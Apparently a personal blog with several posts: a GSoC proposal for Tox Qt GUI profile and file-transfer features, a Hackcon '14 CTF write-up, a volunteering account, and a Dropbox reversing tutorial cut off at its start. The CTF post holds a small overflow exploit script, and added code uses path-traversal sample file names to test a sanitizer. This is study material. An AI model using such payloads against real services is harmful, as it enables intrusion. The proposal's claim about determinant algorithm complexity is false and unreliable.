GSoC Proposal: User Profile & File Transfer Support in Tox Qt GUI


Recently, I applied for Google Summer of Code, but I was not able to get through because my mentoring organization, applying as an organization for the first time, did not get enough slots from Google. I applied for user profile & file transfer support in the Tox Qt GUI client.

Short Description:

This project aims at making the Tox Qt GUI client more elegant and user friendly by introducing user profile creation and data portability, so that users will be able to carry their data in either encrypted or raw format and log in from different machines under the same profile. Another feature which the project will introduce is file transfer support with a nice file transfer manager widget, something similar to Firefox’s download manager.

Project:

The project will mainly deal with 2 major tasks. Two of them (user profile support and file transfer support) have something in common: they improve the security & reusability of the client.

One of the key goals of the project is to introduce user profile support in Tox Qt GUI. Currently, Tox Qt GUI does not save the user data; instead it creates a new profile, and nothing carries over except the GUI-specific settings. The current proposal aims to introduce user profile support in the Qt client. The functionality of the user profile support includes a login dialog, an import/export dialog, creating new profiles, logging in using any of the profiles already created in the Qt GUI, re-logging in under a different profile without restarting the application, and exporting/importing a profile in raw/encrypted format.

libtoxdata is a new library that provides a standardized and secure way to save a user profile on disk. Most Tox clients still save all user data in raw format, meaning that once a data file is stolen, the user loses access to the account, but with this library a user can password-encrypt the Tox data file when storing it on disk. This feature will allow users to carry the data files in either raw or encrypted format and connect to the Tox network from any other machine.

Login dialog

(Mockup UI repo: https://github.com/seshagiriprabhu/gsoc-1)

Consists of two widgets:

1. Existing user widget:

An existing user can enter his/her profile name and password to log in. Only users with user data pre-loaded locally will be able to advance further and use the messenger. The “nickname” in the login window is just a profile name, which is always unencrypted; it has nothing to do with the nickname. If the profile is password-protected, the nickname and other information will be encrypted using that password, but not the profile name, since the user needs to differentiate between different encrypted user profiles.

Mockup UI – 1: Login window for existing users

Each user profile would have its own folder (let's say: /home/seshagiri/.config/tox/), and each folder would have a user profile file, which is just the tox_save() data encrypted by libtoxdata, so any client could add support for user profiles just by using that library.

When a user tries to log in using a profile name chosen from the drop-down menu of [Mockup UI – 1], the widget will parse the corresponding .tox file from the profile directory using the data_init_load and data_unlock functions:

tox_data *profile = data_init_load("/home/seshagiri/.config/tox/whatever.tox");
data_unlock(profile, "password1");

If data_unlock returns zero, the login was successful. The next step would be to load the user environment using the tox_data function.

uint8_t *buffer;
size_t size = data_read_messenger(profile, &buffer);
tox_load(tox, buffer, size);

2. New user widget:

Mockup UI – 2: Sign up page for new users

A user could create a profile by entering a profile name and password. A user can create multiple profiles under the same name, as the tox core assigns each profile a hash upon registering. A user will also be able to create “raw profiles”, i.e. passwordless unencrypted profiles. When a user creates an account, the widget will call the data_init_new function of ProjectTox-libtoxdata.

tox_data* data_init_new(char *path, uint8_t *data_name, uint8_t *password);

The project will also enable a logout feature that will save/update the tox_data and lock the profile, encrypted, using the data_write_messenger and data_lock functions.

int data_write_messenger(tox_data *data, uint8_t *buffer, size_t length);
int data_lock(tox_data *data);

Import-Export dialogs

(Import dialog mockup UI repo: https://github.com/seshagiriprabhu/gsoc-2)

(Export dialog mockup UI repo: https://github.com/seshagiriprabhu/gsoc-3)

A simple dialog box with a file chooser in it, which will allow the user to pick any file from the disk. After a user chooses something, the widget will try to parse it as a tox data/profile file and display some information such as the profile name, the time when the profile was last accessed, etc.
There are currently 3 different tox data files: toxcore raw, libtoxprofile raw and libtoxprofile encrypted. These are the two cases which the user profile import/export will encounter:

Case 1: Only encrypted profiles
Import: Allows importing encrypted profiles and raw toxcore data. When the user tries to import raw toxcore data, it will be converted to a tox encrypted profile, i.e. the user will be asked to give it a profile name and password.
Export: Allows exporting already existing profiles (which are all encrypted tox profiles) as tox encrypted profiles (basically just makes a copy of a selected profile) and as raw profiles (just for compatibility with other clients).

Case 2: Both encrypted and raw profiles
Import: Allows importing encrypted profiles, raw profiles and raw toxcore data. When trying to import raw toxcore data, it can be converted to a tox encrypted or raw profile, i.e. the user will have an option to choose. For encrypted, the user will be asked for a profile name and password; for raw, just a profile name.
Export: Allows exporting already existing profiles (which are all either encrypted tox profiles or raw tox profiles) in all possible formats, i.e.
raw profile → raw profile,
raw profile → encrypted profile,
raw profile → toxcore raw,
encrypted profile → raw profile,
encrypted profile → encrypted profile,
encrypted profile → toxcore raw.

Mockup UI – 3: When the import dialog is opened

Mockup UI – 4: The widget displays some of the unencrypted fields of the loaded file

Upon selecting a file, the widget will parse it and display some of the data (profile name, unix timestamp of when the profile was last used, profile type etc.) read from the unencrypted block of the .tox file.

Mockup UI – 5: Import dialog calls an authentication dialog

Whether it's case 1 or 2, the widget will force the user to create an encrypted profile when a raw profile is imported. The data_init function will be called here to create an encrypted profile.

Mockup UI – 6: When an encrypted profile is imported

In both case 1 and 2, when a user tries to load an encrypted profile, the widget will prompt the user with a dialog box to enter the password in order to unlock the profile. This is done by calling the data_unlock function.

Mockup UI – 7: Export dialog box with filters

After a user logs in, the data is unlocked and hence we could export it to any format we want. The only condition to be checked here is whether a user is logged in or not before exporting. The export widget will call getSaveFileName of QFileDialog to pick the destination and will create a copy of /home/seshagiri/.config/tox/current_user.tox in the directory which the user prefers, if the currently logged in user uses an encrypted profile. This is the code snippet which exports to any of the filters (raw, encrypted or toxcore raw):

// RAW, ENC and TOX_RAW are string-literal macros holding the filter names.
QString selectedFilter;  // receives the filter the user picked in the dialog
QString filename = QFileDialog::getSaveFileName(this, tr("Export Profile"),
                  MySettings.value(DEFAULT_DIR_KEY).toString(),
                  tr(RAW ";;" ENC ";;" TOX_RAW), &selectedFilter);
if (selectedFilter == RAW) {
      // code for encrypted -> raw or raw -> raw conversion
} else if (selectedFilter == ENC) {
      // code for enc -> enc or raw -> enc conversion
} else {
      // code for enc -> tox_raw or raw -> tox_raw conversion
}

File transfer support is the next major task in this project. A new file transfer widget would be introduced as a part of the project. The file transfer widget maintains a list of files transferred with a particular friend; the list will be stored in an SQLite DB and sorted based on the timestamp of file transfer actions (send, receive, pause, accept and stop).

The file transfer widget is to be located between the friend item widget and the message display widget. It has two states: opened and closed. When a user chats with one of his friends, upon opening the file manager widget, it will display a (file transfer manager) dialog box with a list of files transferred to that particular user using a QListWidget. A global file transfer manager could be accessed from the settings menu; it has an embedded filter in order to facilitate file search based on filename, friend(s), timestamp, send, stopped and received.

Users will be able to upload a file by clicking on the file attachment button at the right corner of the ChatView widget. Upon clicking on file transfer widget, a file transfer manager dialog will pop up.

File Transfer Manager Dialog

(Mockup UI repo: https://github.com/seshagiriprabhu/gsoc-4)

In an effort to bring all the file transfer actions to a single place, the project will introduce a file transfer manager just like the download manager of Firefox. All the file transfer history could be accessed from this file transfer manager. The file transfer manager also has an embedded search filter to search based on various criteria including: filename, date and time of transfer, send, received, to/from a friendID etc.

Mockup UI – 8: File Transfer Manager Mockup UI

Upon accepting a friend request, the project will enable certain callback functions of the toxcore, including:

  1. File send request
    void tox_callback_file_send_request(Tox *tox, void (*function)(Tox *m, int, uint8_t, uint64_t, uint8_t *, uint16_t, void *), void *userdata);
  2. File control request
    void tox_callback_file_control(Tox *tox, void (*function)(Tox *m, int, uint8_t, uint8_t, uint8_t, uint8_t *, uint16_t, void *), void *userdata);
  3. File data
    void tox_callback_file_data(Tox *tox, void (*function)(Tox *m, int, uint8_t, uint8_t *, uint16_t length, void *), void *userdata);
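
A handler for the first callback, as an added example (not code from Tox Qt GUI or toxcore): the file name and size arrive from the friend, so they are treated as untrusted before they reach the disk or the transfer history. The argument order (friend number, file number, file size, file name, name length) is assumed from the signature above; struct pending_file, sanitize_peer_filename and demo_name are hypothetical names.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef struct Tox Tox;   /* opaque stand-in so the example builds without toxcore */

#define SAFE_NAME_MAX 128

/* Hypothetical record for one incoming transfer. */
struct pending_file {
    int      friend_number;
    uint8_t  file_number;
    uint64_t total_size;                /* claimed by the peer, not yet verified */
    int      name_replaced;             /* 1 when the peer's name was unusable */
    char     filename[SAFE_NAME_MAX];   /* NUL-terminated, no path components */
};

/* Reduce a peer-supplied name to a bare file name.
 * The input is length-delimited and may lack a terminating NUL.
 * Returns 1 if a usable name was produced, 0 if a placeholder was stored. */
int sanitize_peer_filename(const uint8_t *name, uint16_t len,
                           char *out, size_t out_sz)
{
    size_t start = 0, n = 0, i;

    if (out == NULL || out_sz < 2)
        return 0;

    /* Drop everything up to the last path separator (POSIX or Windows). */
    for (i = 0; name != NULL && i < len; i++)
        if (name[i] == '/' || name[i] == '\\')
            start = i + 1;

    for (i = start; name != NULL && i < len && n + 1 < out_sz; i++) {
        uint8_t c = name[i];
        if (c == '\0')
            break;                          /* embedded NUL ends the name */
        if (c < 0x20 || c == 0x7f || strchr("<>:\"|?*", c) != NULL)
            c = '_';                        /* control and reserved characters */
        out[n++] = (char)c;
    }
    out[n] = '\0';

    /* Empty names and the directory entries "." and ".." are never accepted. */
    if (n == 0 || strcmp(out, ".") == 0 || strcmp(out, "..") == 0) {
        snprintf(out, out_sz, "unnamed_file");
        return 0;
    }
    return 1;
}

/* Matches the function-pointer type expected by tox_callback_file_send_request. */
void on_file_send_request(Tox *m, int friendnumber, uint8_t filenumber,
                          uint64_t filesize, uint8_t *filename,
                          uint16_t filename_length, void *userdata)
{
    struct pending_file *pf = userdata;
    (void)m;
    pf->friend_number = friendnumber;
    pf->file_number   = filenumber;
    pf->total_size    = filesize;
    pf->name_replaced = !sanitize_peer_filename(filename, filename_length,
                                                pf->filename,
                                                sizeof pf->filename);
}

/* Demo helper: feed constructed bytes through the handler. */
const char *demo_name(const char *raw, uint16_t len)
{
    static struct pending_file pf;
    on_file_send_request(NULL, 0, 0, 0, (uint8_t *)raw, len, &pf);
    return pf.filename;
}

int main(void)
{
    /* Constructed sample names, as a remote peer might send them. */
    static const char *samples[] = {
        "../../.ssh/authorized_keys", "C:\\Users\\x\\report.pdf", "..", "a\nb:c"
    };
    size_t i;
    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%s\n", demo_name(samples[i], (uint16_t)strlen(samples[i])));
    return 0;
}
```

The sanitized name is what should be shown in the transfer manager and used when creating the file; the raw bytes from the peer are not used as a path.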

An SQLite database is going to be used as a part of the project for storing the file transfer history of the users. The application will be tweaked to detect an SQLite db file under a specified directory on the disk. If it is not found, the application will create a new database file. This check will happen whenever a user logs in.

Schema of the file transfer database would look like this:

CREATE TABLE transfer_details (
    ID INTEGER PRIMARY KEY,
    transfer_role VARCHAR,      -- one of {send, received, sending, receiving, paused, stopped}
    timestamp DATETIME,         -- updated to the current system time when the transfer role changes
    filename VARCHAR,
    userID VARCHAR,             -- logged-in user's ID
    friendID VARCHAR,           -- ID of the person at the other end
    totalFileSize FLOAT,        -- actual size of the file to be transferred
    transferedFileSize FLOAT    -- size of the file transferred so far
);

SQLite currently does not support data encryption. There is the open source SQLCipher, but it is not available for the Qt platform yet. So it's up to the user to keep the database file safe on the disk. The project will not use any object relational mapping library; rather, plain SQL queries will be used to access transfer_details.

If time permits, the project will include an implementation of a spell checker with multilingual support in the input text box widget. Currently, the Tox Qt GUI supports only the English language and it doesn’t have a spell checker. This proposal aims to integrate a spell checker with the input text box widget, which will allow the user to fix misspellings. The user would be able to select different language dictionaries from a context menu. The Hunspell spell checker will be integrated into the Qt client, as it is extensively used in popular open source applications like LibreOffice, OpenOffice, Mozilla Firefox, Thunderbird and Chromium. Hunspell has support for Mac OS X and Windows based operating systems.

Files to be added to the project:

src/logindialog.hpp: An interface which is the entry point to the application. The user will be able to use the messenger only after authenticating or signing up. Will be called from the starter class before creating the main window.
src/importdialog.hpp: A dialog box which will import the user profiles. This class also validates the user profile data file and loads the user environment (previous GUI size, friend list, chat logs etc.) upon completing the import.
src/createuserprofile.hpp: A dialog box for creating an encrypted profile, used if the imported user profile is raw.
src/validateprofile.hpp: A dialog box which asks for the password of the encrypted user profile being imported.
src/exportdialog.hpp: A dialog class which deals with exporting the user profile data to a file. It will allow the user to export to these formats: raw, encrypted and toxcore raw.
src/filetransfermanagerDialog.hpp: A dialog box which displays a list of files transferred by the current user. It also has an embedded file filter.
src/filetransferwidget.hpp: A widget which maintains a list of files transferred by the currently logged in user. This widget will make use of the DatabaseManager class for all the database related operations.
src/fileItemDelegate.hpp: This class provides display and editing features (pause, resume, stop) for data items of the model used for the QTreeView in the FileTransferManager dialog.
src/filefilterWidget.hpp: A widget for filtering the files based on filename, timestamp, friend, send and received. This widget will also interact with the DB.
src/DatabaseManager.hpp: An object class for creating, storing, updating and deleting file transfer data in the SQLite database. This will create a db file on the local disk either if it is destroyed/lost or when the application is opened for the first time.
submodules/ProjectTox-libtoxdata: A library for saving and loading encrypted copies of the Tox Messenger using scrypt-jane.
src/spellchecker.hpp: A widget which uses Hunspell to check for errors in the words entered in the input text widget. The widget will also have a custom menu bar which could be used to get word suggestions if there are any spelling errors, and the user could also select other languages using the same.

Profit for Tox Qt GUI

  1. Facilitate the use of Tox Qt GUI by allowing the user to create profile(s) and store the data in encrypted or raw format, thus making the Qt client more intuitive, portable and secure.
  2. A widget for sending and receiving files for the Qt client.
  3. Increasing the reach of the Qt client to a wide range of people by enabling multilingual support.

Roadmap

  1. Until mid May: Publish my goals to the Tox Qt GUI community and try to get some feedback and suggestions on my plans. I will get familiar with the specific Qt GUI internals that I require for my work.
  2. Until end of June: Implement the first feature: that means that I will begin with implementing login and user account creation, and continue with import/export of user profiles.
  3. Until end of July [buffer up to mid August]: Implement the second feature: I will begin designing (hard coded) the UI for the transfer widget and continue with implementing the functionality of the widget, i.e. send, receive, pause, accept, stop etc.
  4. Until mid August: If the above tasks are completed, integration of the spell checker for the input text widget with multilingual support and support of notification messages would be implemented.

Detailed timeline

May 12 – May 23: Academic examinations
May 24 – May 27: Discuss implementation details and ideas. Fix some more bugs.
May 28 – June 2: Code the import, export and all the sub dialog boxes
June 3 – June 22: Integrate libtoxdata into the Tox Qt GUI code base, validate the login, profile creation, importing raw and encrypted profiles, exporting to raw, encrypted and toxcore raw formats.
June 23 – June 29: Mid review + Testing all the features implemented so far
June 30 – July 6: Code the file transfer manager dialog + Implementation of FileItemDelegate, FileFilter, FileTransferWidget, DatabaseManager and FileTransferManager
July 7 – July 20: Implement fileSendReceived, fileSendRequestReceived, fileControlReceived, fileDataReceived, fileControlReceived, fileDataReceived, sendFiles, receiveFiles and fileSendCompleted functions.
July 21 – July 27: Implement file drag’n’drop functionality in the message display widget and input text widget and integrate it with the file transfer widget
July 28 – Aug 3: Implement search functionality with smart filter (filename, friend(s), timestamp, send and received) in the file transfer manager dialog
Aug 3 – Aug 11: Testing file transfer support
Aug 11 – Aug 22: Final report + if the above tasks are completed, a spell checker with multilingual support in the input text widget would be implemented
Afterwards: Continue testing and bug fixing

Personal Details

  • Full name: Seshagiri Prabhu Narasimha
  • Timezone: UTC +5:30
  • Email Address: seshagiriprabhu@gmail.com
  • IRC username: seshagiri
  • Patches for Tox: #768, #108 and #108
  • Github repo: https://github.com/seshagiriprabhu/
  • Will you treat Google Summer of Code as full time employment?:  Yes
  • How many hours per day will you work?: 7+ hours per day
  • List all obligations (and their dates) that may take time away from GSoC: I have exams starting from May 12th to 23rd. College will re-open in mid July. When the college re-opens, I will be able to work only for 5-6 hours per day.
  • Estimated last day of classes/exams: May 23rd
  • Estimated first day of classes: July 16th

Why Tox Qt GUI

I envy Tox, an open source messaging application that is developed from the ground up by putting privacy at the forefront, which makes it revolutionary. I have made a few contributions to Tox before. I have been providing bug reports and patches to Tox from time to time (issues #768, #108). I have also written some other patches that are not yet committed (issues #108).

I have designed the UI for several websites, including inctf.in, portal.inctf.in etc. In June 2013, I made a contribution to Sympy, a python library for symbolic mathematics, in which I replaced the Bareiss fraction-free algorithm (with computational complexity of O(n!)) for determining the determinant of matrices with the Laplace expansion algorithm, which runs in O(n²).

Recently, I won a programming challenge which involved the development of an open source disaster management communication information system for an NGO, Wise Earth Technology. The system consists of mobile communication stations, running on cheap open source hardware (raspberry pi connected to a 5 inch TFT display), supported by a web application that uses the django web framework. In order to guarantee the peaceful use of this application, while ensuring that the military can use it for rescue operations during disasters, a new Peaceful Open Source License was adopted.

That said, I think that I will succeed in providing clean and fully functional enhancements to the whole project.


Hackcon ’14 binary services


Service 1

We figured out late (just 2 hours before the contest was about to end) that there were 3 binary services running on the server. And we were able to exploit just before the contest ended.

This is the link to the binary file:

After decompiling the binary, we were able to figure out the theory behind the exploit. But as the “raw” socket service was running on a Windows server, it took us a long time to figure out “how to exploit”.

  char Str2;
  int v13;
  int v14;
  int v15;

  Str2 = 0;
  v14 = send(s, "Please enter your password: ", 28, 0);
  if ( v14 == -1 )
  {
    v1 = WSAGetLastError();
    printf("send failed with error %d\n", v1);
  }
  v15 = recv(s, &Str2, 36, 0);   // writes up to 36 bytes starting at Str2
  if ( v15 > 0 && v15 < 512 )
  {
    if ( v13 == 'TFSM' )         // v13 is never assigned in this function
      read_flag(s);
    else
      read_flag_2(s, &Str2, 32);
  }

Telnet, python sockets etc. didn’t work. And finally one of the admins published a hint that putty would be a good choice to exploit it. Python telnetlib finally worked for us.
The POC: Our goal is to get control to the function read_flag(), which doesn’t check the password we are passing. Str2 is 1 byte, and we have v15, v14 and v13 on top of Str2. And we need to fill in v13 with TFSM.
Exploit:

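import telnetlib

attack_ip = '127.0.0.1'
port = 37517
# 36 bytes, the length passed to recv(); "MSFT" is 'TFSM' as stored little-endian
exploit = b"MSFT" * 9

con = telnetlib.Telnet(attack_ip, port)
print(con.read_until(b':'))     # wait for the password prompt
con.write(exploit + b"\n")
print(con.read_all())           # reply from the service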

Which would print flag like this:

adjfgasdjkfgaskjdfgjkasdhgfhkajs

Hence we lost $500*N*T (N=number of time flags planted in our vuln machine, T=Total no of teams-1) points by not solving this on time.
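
The bug in the decompiled handler above, modelled as an added example (not code from the original post or the contest binary): recv() is allowed to write 36 bytes, so the v13 check reads bytes the client supplied, and capping the read at the buffer size removes that. The frame layout (a 32-byte buffer with v13 directly after it) is an assumption inferred from the 36 and 32 in the listing, and the function names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed layout, not confirmed by the page: the password buffer that the
 * decompiler shows as "char Str2" spans 32 bytes and v13 is the 4 bytes
 * directly after it. */
#define BUF_LEN   32u
#define FRAME_LEN 36u                 /* BUF_LEN + sizeof v13 */
#define MAGIC     0x5446534Du         /* numeric value of the constant 'TFSM' */

/* Constructed input: the 36-byte string the page sends ("MSFT" * 9). */
#define PAGE_PAYLOAD "MSFTMSFTMSFTMSFT" "MSFTMSFTMSFTMSFT" "MSFT"

/* Model of recv(): copies at most cap bytes of msg to the start of frame. */
static size_t model_recv(unsigned char *frame, size_t cap,
                         const unsigned char *msg, size_t msg_len)
{
    size_t n = msg_len < cap ? msg_len : cap;
    memcpy(frame, msg, n);
    return n;
}

/* v13 as a little-endian x86 build reads it back from the frame. */
static uint32_t read_v13(const unsigned char *frame)
{
    const unsigned char *p = frame + BUF_LEN;
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* As decompiled: the length given to recv() is 36, four bytes more than the
 * buffer. Returns 1 when the v13 == 'TFSM' branch (read_flag) would run. */
int vulnerable_takes_flag_branch(const unsigned char *msg, size_t len)
{
    unsigned char frame[FRAME_LEN] = {0};
    model_recv(frame, FRAME_LEN, msg, len);
    return read_v13(frame) == MAGIC;
}

/* Hardened: the read is capped at the size of the buffer itself, so the
 * bytes that hold v13 keep whatever the program put there. */
int hardened_takes_flag_branch(const unsigned char *msg, size_t len)
{
    unsigned char frame[FRAME_LEN] = {0};
    model_recv(frame, BUF_LEN, msg, len);
    return read_v13(frame) == MAGIC;
}

int main(void)
{
    const unsigned char *p = (const unsigned char *)PAGE_PAYLOAD;
    size_t len = sizeof(PAGE_PAYLOAD) - 1;

    printf("payload length: %u\n", (unsigned)len);
    printf("recv cap 36 -> read_flag branch taken: %d\n",
           vulnerable_takes_flag_branch(p, len));
    printf("recv cap 32 -> read_flag branch taken: %d\n",
           hardened_takes_flag_branch(p, len));
    return 0;
}
```

The `v15 < 512` test in the listing does not help, because recv() can never return more than the 36 it was given; the fix is to pass the buffer's real size and to initialise v13 before it is compared.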

Service 2

(will be updated soon)

Amritavarsham 60: My experience


Amritavarsham 60, as expected, was the biggest event I have ever attended in my life. I started my seva on 20th of September, as Br. Ashish said there was a lack of people doing sand seva. So I joined them for the first two days (18 hours per day shift). We cleared up around 1 acre of land (near the stage where the VIPs sit) with coarse sand and with the help of around 150 volunteers.
As more than half a million people were expected to attend the b’day, accommodation was arranged for 6000 people in our college football ground (8 acres of land); 30 tents (each tent capable of accommodating 200 people) were built there for the same. There were only very few (5) tents which were floored properly with tiles. In the rest of the tents, the floor had red sand (indeed mud). Hence the accommodation in-charge thought to put the bunker beds for the same. Within a week before the birthday, the Ettimadai metal industry had manufactured the parts for 2500 bunker beds at a record speed. From 22nd morning onward, Br. Hariji (our cyber security Hariji) asked me to help Br. Babuji (he is the in-charge of preparing upma and idily in the ashram kitchen) to assemble bunker beds. On the first day, we (around 30 people including Vipin sir, Jinesh ettan, some cyber security staff, ashram inmates and a few students who work under Robotics Srinivasji) were able to assemble only 300-400 bunker beds. As I was new to such work, there were several cuts and wounds on my palm. It took 3 days to heal the wounds and it was really painful (indeed burning) while having food. That’s why I was using a glove during the birthday. A bunker bed sheet had fallen on my feet while unloading from the truck, hence my left leg was swollen. I took an antiseptic injection at the end of day 1 from the temporary clinic set up near the darshan stage. But on the next day, by Amma’s grace, around 150-200 people from Ettimadai had come there to help and we were able to assemble all the 2500 bunker beds by 24th afternoon. I was surprised how hard the Tamil devotees were working to finish the work. They were so enthusiastic, and most of them work in the cultivation field and the metal and packaged drinking water industries run by the Ashram at Ettimadai. That’s why I think even the kids in their group work like labourers. Amazing stamina they have, I would say.
Even the head master of Amrita Vidyalaya, Ottapalam was there to help us assemble the beds on all days. On the second day, the ground accommodation in-charge Br. Babuji was impressed by my work and gave me a box spanner which can be used to tighten the nuts within 10 seconds. It takes at least 2 minutes to tighten a nut using an ordinary spanner.
These 5 days were really good and there was no mental distress as it involved only physical activities (which indeed require muscle power) and you don’t have to argue with someone. Food will be served at the place where you work and you don’t have to travel at all if you are not planning to have *luxurious* (comparatively) mess food!
Officially, I was one of the food coordinators of the VIP/VVIP section, in which my duty was just to carry/transport food from the college canteen to VVIP dining hall 1 (guest room near the AUMS office) and VVIP dining hall 2 (near the Vidyut office), and to transport food from the temporary kitchen set up near the engineering boys hostel to VIP dining hall 3, which is the mechanical class rooms (at the entrance of the college). We had to carry the food from the entrance near the Acharya hall all the way to the respective dining hall (around 100-150 meters). And each vessel weighs more than 60 kgs. Except for the last two days, we were given only first year cse students, and most of them were lean and were not capable of carrying food vessels which weigh more than 60 kilograms. So we (me, Bijoy sir (an ex-staff of Amrita), Br. Sudharshan ji (works in cyber security) and Murali sir (husband of Gayathri ma’am, ece dept)) had a very hard time carrying heavy vessels.


As I have mentioned earlier, the food for the VIP dining area is prepared in the engineering boys hostel kitchen and it's the same food which is served in the common food counters near the darshan hall. The peculiarity of the VIP dining area is that one can sit and eat in a neat and clean place. We were told strictly *only to allow* special invitees, swamijis, aghoris and people with a food coupon on the 25th and also for the 26th morning breakfast. The VIP dining area started functioning from 24th night and it went really smoothly till 26th morning (before Sri Narendra Modi arrived). After he arrived it was full of chaos and none of the vehicles were allowed to enter the campus for security reasons. We had to carry food from the entrance gate at the back end of the college to the mechanical class room for the lunch (around 500-600 meters). There was only a single dining hall for VVIPs and VIPs, i.e. dining hall 3 (mechanical class room), as Modi and other cabinet ministers had their lunch in dining hall 1 and dining hall 2. The situation became worse as the main food coordinator (name I am not mentioning due to security reasons) had issued many food coupons without informing us and left everything on us to handle the situation (so we had to use dynamic management :-P). The 26th night was horrible for the people who had dinner in dining hall 3, as the rice which we had brought from the kitchen was spoiled, as it was cooked in the afternoon. Later, they gave us upma as a replacement for the rotten rice. As Amma came to know about the spoiled/rotten rice issue, she appointed Abhayamrita Chaitanya (pro chancellor of our University) to take care of food. And it's amazing that, only due to this management, on 27th September, even though 1/2 a million people were there, only 3 vessels of rice, 2 pulisherry and 2 avails were left at the end of the day.
He has such a good managing capacity and he is such a nice person to talk to, who has a lot of experience in dealing with various situations.
One of the funniest conversations which I had with a bramacharini teacher in our campus is given below:
On 26th afternoon, when I was standing at the entrance of dining area 3, Bri. XOXO brought 2 of her relatives to the counter who didn’t have any ID card or food coupon. She was arguing with me a lot, telling so many moral stories about food, hunger and humanity. This is the last dialogue she told me: “You must show some humanity to people”. And I replied: “You must show humanity to your students too”. On hearing this she ran away with her relatives 😛 I just did my duty. Hence I don’t have to worry about the consequences. On the same day, initially we were told not to allow any swamijis or aghoris to enter the dining hall till 2 PM as there were several VVIPs having their lunch. Dealing with the swamijis (not from our Ashram) was the most bitter experience I have ever had in my life. The gaali from swamijis are worse than the politicians. They abused me in various Indic languages which I think even Google translate cannot understand. Uff! I don’t know how they became swamijis and aghoris. I think congress leader PC George is decent when compared to them.

27th September was the busiest day when compared to any other seva day, as it was the birthday of our beloved Amma. I just got 1 hour of sleep, as the VVIP food counter was wrapped up after Sivamani’s and other cultural events were over. All the cultural programme guests were coming and having food in the same dining hall. We had to collect the breakfast from the kitchen and college canteen at 6:00 AM as usual. On the 27th, collecting food from the kitchen was the most tedious job, as we had to literally fight with Abhayamrita ji and Gopan ji (mess in-charge of Ettimadai campus) to get food. They would always give very little food as they were afraid that we would return food, as it was the last day and they could not reuse it unlike other days. So we had to do several trips to the kitchen to collect the food required for dining hall 3.

 

The lunch on 27th afternoon gave us the most mind-stressing work. The main food in-charge had given us the wrong information regarding the count of people who would be having lunch in dining hall 3. The food in-charge had given a count of 1200 people, and around 5500+ people had lunch from our counter. We ran the counter for more than 4.5 hours to give food to those who came with a coupon. When the food transport was not there, I was standing near the entrance to block people without coupons and also fake people who try to trespass the queue with various reasons. As per the initial count, we had brought only 13 vessels of rice and an equivalent amount of curry, sambar and payasam for the same. We had to do 4 such trips to feed the people who had come with the token. And that was really tiring. Without the help of the S1 M.Tech mechanical students, I would have died then and there due to blood pressure, as I had carried around 30 vessels in 4 hours. We closed dining hall 3 at 4:30 PM. It was a nice experience to see how people behave vigorously when they are feeling hungry. I have seen various VVIPs, including music director Rahul Raj and Dr. Vijay Bhatkar, who waited in the queue along with his family to have Amma’s prasad. Whereas it's really hard to manage those who are not physically old and act like they are old (they come with various diseases starting from gas trouble, diabetes to heat patients). The other set of busy people are news reporters, who held the collar of one of the student volunteers for not allowing them to go to the stage through the dining hall 3 corridor, which is a short cut for them, and it's sad to know that they are from Amrita TV. A similar incident happened at the entrance of the college main gate, as India Vision’s stickerless car was stopped by the security guys. The reporters beat two of them.
If we had done something against them, they would write something against Amma; that’s why we didn’t do anything to the Amrita TV reporters when they tried to trespass our dining hall 3 security.
A photo taken while transporting food during Amritavarsham 60


Most people tell me that “Your seva is just to have food, whereas we don’t even get food as we do XYZ seva where I have to sit for A hours daily, or we do ABBC seva for H hours, where I have to grab all the wrappers lying down etc”. I had a meal only once in the dining area; the rest of the time, I had food from thattukadas and various free food stalls which were installed near the darshan hall, as the food gets over in the dining halls. My intention for Amritavarsham 60 was to do a lot of seva beyond my capabilities (stressing my mind and body) and not to be near Amma just to get my face printed in a newspaper photo or in the live streaming video.

http://www.youtube.com/watch?v=-eARTqnx_10

 

I am not happy that I was not able to see Amma’s paada pooja or hear Modi’s speech live. I was able to see the completed birthday stage only on the 28th night at 1:00 AM, i.e. when a dance by Odissi dancers was going on just before Shankar Tucker’s performance (as I was involved in various sevas). Sometimes in the daytime (1 or 2 hours between lunch and dinner), I used to do security job also. On the night of September 27th, we chased and caught two young local kids (aged around 16) from the college premises who were taking photographs of the girls sleeping in the lobby. We handed them to the security head Br. Abhiramji.
I stayed awake till 8 AM on the morning of the 28th. Then I was not able to control myself. I went and slept in the hostel till 7 AM on the 29th (23 hours). While I was sleeping I didn’t know what was happening around me. I didn’t even know when Arvind (my roommate) came to my room and I opened the door for him. Before going to sleep, I had my last food on the evening of the 27th, i.e. Amma’s prasad. When I woke up, I was feeling so hungry and searched for food at Vallikavu. I couldn’t find any shops open at Vallikkavu as it was Sunday. I went all the way to Parayakadavu and finally found that Theeramaithri was open. It was like a situation in which a person searches for water in a desert and finally finds a sea in front of him. I had 3 full kutti puttu, 2 egg curries and 2 bananas. The bill came to around 50 rupees; I gave her a 100 rupee note and asked her to feed someone who is poor and hungry for free with the balance amount.
By doing all these sevas, Amma has taught me how to survive in such extreme conditions (sometimes without food or without water and under the red hot sun, i.e. while assembling bunker beds), how to manage situations under pressure, how to behave with various people, how to take decisions according to the situation, etc. I have learned and leaned a lot at the end of this b’day with a lot of awesome memories and experience which my friends who were not able to attend Amritavarsham 60. I am feeling blessed to be part of Amrita Kudumbam and also to volunteer for Amritavarsham 60. I wish I could also volunteer for Amritavarsham 70 in 2023. My four months’ workout at the gym has helped me a lot to survive in such extreme conditions. Only due to the same, I was able to do a lot (comparatively, there are a lot of people who have done more than me) of seva. I wish Amma will give me the chance and strength to do seva like this always.
Amritavarsham 60: Main stage

Aum Amriteshwayai Namah!

Reversing Dropbox client application for fun


Dropbox is a cloud-based file storage service used by millions of users. The security of Dropbox has not been analyzed properly. Recently, I came across a paper titled Looking inside (Drop)box, which was presented at USENIX. The paper explains how to reverse engineer the Dropbox client application and extract its algorithms. Dropbox clients are mostly written in Python. The author of the paper, Dhiru Kholia, has uploaded the essential scripts required to reverse engineer Dropbox.

Let’s start hacking

Unpacking and decrypting encrypted Dropbox bytecode

The first thing to do is to get the Dropbox client:

wget -O - "https://www.dropbox.com/download?plat=lnx.x86" | tar xzf -

Clone Dhiru’s dedrop repository:

➜ (Dropbox) git clone https://github.com/kholia/dedrop

The paper says to run Dropbox with a custom LD_PRELOAD. The shared object required for the custom LD_PRELOAD can be built using:

